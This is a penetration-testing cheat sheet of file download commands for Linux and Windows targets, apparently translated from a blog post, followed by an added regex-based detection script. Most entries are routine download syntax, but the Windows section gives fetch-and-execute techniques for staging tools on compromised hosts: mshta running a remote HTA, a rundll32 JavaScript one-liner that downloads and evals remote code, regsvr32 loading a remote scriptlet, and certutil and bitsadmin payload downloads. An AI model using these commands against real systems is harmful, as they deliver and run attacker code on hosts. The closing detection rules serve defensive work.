File Transfer Techniques for Penetration Testing: Linux and Windows Download Commands

This article compiles common file download commands and tools used in penetration testing for both Linux and Windows environments, covering utilities such as wget, curl, axel, aria2, PowerShell, certutil, bitsadmin, and others, with example syntax for direct, background, and resumable transfers.

During penetration testing, files often need to be transferred to a target host for privilege escalation or to maintain control. When direct transfer is not possible but the host has network connectivity, the files can be downloaded from the internet instead.

Linux download utilities

Wget

Wget supports resume, multiple files, bandwidth control, etc.

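<code># plain download
wget http://www.sample-videos.com/video/mp4/big.mp4
# -b: run the download in the background
wget -b http://www.sample-videos.com/video/mp4/big.mp4
# -c: resume a partially downloaded file
wget -c http://www.sample-videos.com/video/mp4/big.mp4
# download from an FTP server that requires credentials
wget --ftp-user=<user_name> --ftp-password=<Give_password> Download-url-address</code>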

Curl

Curl is a versatile downloader that can upload or download files, resume downloads, and supports many protocols.

<code>curl -o um.mp4 http://www.sample-videos.com/video/mp4/big.mp4</code>

Axel

Axel is a lightweight accelerator that opens multiple HTTP connections to download file fragments in parallel.

<code>apt-get install axel
axel http://www.sample-videos.com/video/mp4/big.mp4</code>

Aria2

Aria2 is an open‑source command‑line download accelerator supporting multiple connections and maximum bandwidth usage.

<code>apt-get install aria2
aria2c http://www.sample-videos.com/video/mp4/big.mp4</code>

Perl

Perl can download files using LWP::Simple.

<code>#!/usr/bin/perl
use LWP::Simple;
getstore("http://domain/file", "file");</code>

Python

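Python can download a file with urllib.request (urllib2 in Python 2).

<code>#!/usr/bin/python3
import urllib.request

# Fetch the URL and write the raw bytes; binary mode keeps non-text files intact
with urllib.request.urlopen('http://domain/file') as u, open('local_file', 'wb') as localFile:
    localFile.write(u.read())</code>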

Ruby

Ruby can download a file using Net::HTTP.

<code>#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("www.domain.com") { |http|
  r = http.get("/file")
  open("save_location", "wb") { |file| file.write(r.body) }
}</code>

PHP

PHP can download a file with file() and fwrite.

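<code>#!/usr/bin/php
<?php
// file() returns the response as an array of lines
$data = @file("http://example.com/file");
if ($data === false) { exit(1); }  // download failed
$lf = "local_file";
$fh = fopen($lf, 'w');
// join all lines so the whole file is written, not only the first line
fwrite($fh, implode('', $data));
fclose($fh);
?>
</code>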

FTP (bash script)

A non‑interactive FTP script can download a file.

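<code># -n disables auto-login so the credentials can be supplied in the here-document
ftp -n 127.0.0.1 <<EOF
user username password
binary
get file
bye
EOF</code>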

Netcat

Netcat can be used to transfer a file over a listening port.

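<code># on the host that has the file: listen on port 1234 and serve it
cat file | nc -l 1234
# on the receiving host: connect and save the stream to disk
nc host_ip 1234 > file</code>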

Windows download techniques

PowerShell

PowerShell can download a file using System.Net.WebClient.

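<code>$p = New-Object System.Net.WebClient
# PowerShell does not expand cmd-style %homepath%; $env:USERPROFILE is the user's home directory
$p.DownloadFile("http://domain/file", "$env:USERPROFILE\file")</code>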

IPC$ share

<code>copy \\192.168.3.1\c$\test.exe E:\file
cmd.exe /k < \\webdavserver\folder\batchfile.txt</code>

Certutil

Certutil can download a file through its URL cache (-urlcache -split -f). The second command deletes the cached entry for that URL.

<code>certutil -urlcache -split -f http://192.168.3.1/test.exe file.exe
certutil -urlcache -split -f http://192.168.3.1/test.exe delete</code>

Visual Basic (VBScript)

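<code>Set args = Wscript.Arguments
Url = "http://domain/file"
' VBScript does not expand %VAR% inside strings, so resolve the path explicitly
Target = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\%homepath%\file")
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
    .type = 1 ' binary stream
    .open
    .write xHttp.responseBody
    .savetofile Target, 2 ' 2 = overwrite an existing file
end with</code>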

Tftp

<code>tftp -i IP_ADDRESS PUT C:\%homepath%\file remote_path
tftp -i IP_ADDRESS GET C:\%homepath%\file local_path</code>

Bitsadmin

<code>bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.203.140/b.ps1" "E:\phpstudy_pro\WWW\b.ps1"
bitsadmin /rawreturn /transfer getfile http://192.168.3.1/test.txt E:\file\test.txt</code>

Mshta

Mshta can execute a remote HTA file.

<code>mshta http://192.168.3.1/run.hta</code>

Rundll32

<code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);</code>

Regsvr32

<code>regsvr32 /u /s /i:http://192.168.3.1/test.data scrobj.dll
regsvr32 /u /s /i:http://192.168.3.1/test.sct scrobj.dll</code>

Windows Share

<code>net use x: \\127.0.0.1\share /user:example.com\userID myPassword</code>

Format conversion (Nishang)

<code>PS > .\ExetoText.ps1 evil.exe evil.txt
PS > .\TexttoExe.ps1 evil.txt evil.exe</code>

Other utilities

Examples include msxsl.exe, pubprn.vbs, esentutl.exe, extrac32.exe, desktopimgdownldr.exe, etc., which can be abused to download files.
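Most of the Windows commands above leave a recognizable process command line, which is what defenders usually match on. The following is an added example, not part of the original article: it runs patterns for the certutil, bitsadmin, mshta, regsvr32, rundll32 and PowerShell techniques listed above over constructed sample command lines. The rule names, the `classify`/`scan` helpers and the sample lines are assumptions made for illustration.

```python
import re

# Hypothetical rule names; each pattern targets one technique listed in this article.
RULES = {
    "certutil_urlcache": re.compile(r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*\bhttps?://", re.I),
    "bitsadmin_transfer": re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b.*\bhttps?://", re.I),
    "mshta_remote_hta": re.compile(r"\bmshta(\.exe)?\s+\"?https?://", re.I),
    "regsvr32_scrobj": re.compile(r"\bregsvr32(\.exe)?\b.*/i:https?://\S+.*\bscrobj\.dll", re.I),
    "rundll32_javascript": re.compile(r"\brundll32(\.exe)?\s+\"?javascript:", re.I),
    "powershell_webclient": re.compile(r"Net\.WebClient.*\bDownload(File|String|Data)\b", re.I),
}

# Constructed sample process-creation command lines (not real telemetry).
SAMPLE_CMDLINES = [
    r'certutil -urlcache -split -f http://192.168.3.1/test.exe file.exe',
    r'certutil -hashfile C:\Users\a\file.exe SHA256',  # benign use, must not match
    r'bitsadmin /rawreturn /transfer getfile http://192.168.3.1/test.txt E:\file\test.txt',
    r'MSHTA.EXE http://192.168.3.1/run.hta',
    r'regsvr32 /u /s /i:http://192.168.3.1/test.sct scrobj.dll',
    r'regsvr32 /s C:\Windows\System32\example.dll',  # benign use, must not match
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication "',
    r'powershell -c "(New-Object System.Net.WebClient).DownloadFile($u, $f)"',
]


def classify(cmdline):
    """Return the sorted names of all rules that match one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))


def scan(cmdlines):
    """Return (cmdline, matched_rules) for every line that hits at least one rule."""
    return [(c, hits) for c in cmdlines if (hits := classify(c))]


if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_CMDLINES):
        print(f"{','.join(hits):22} {cmd}")
```

The patterns key on the combination of binary name and a remote URL argument, so ordinary uses such as `certutil -hashfile` or registering a local DLL with regsvr32 are not flagged.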

Original source: https://www.cnblogs.com/-mo-/p/12109717.html
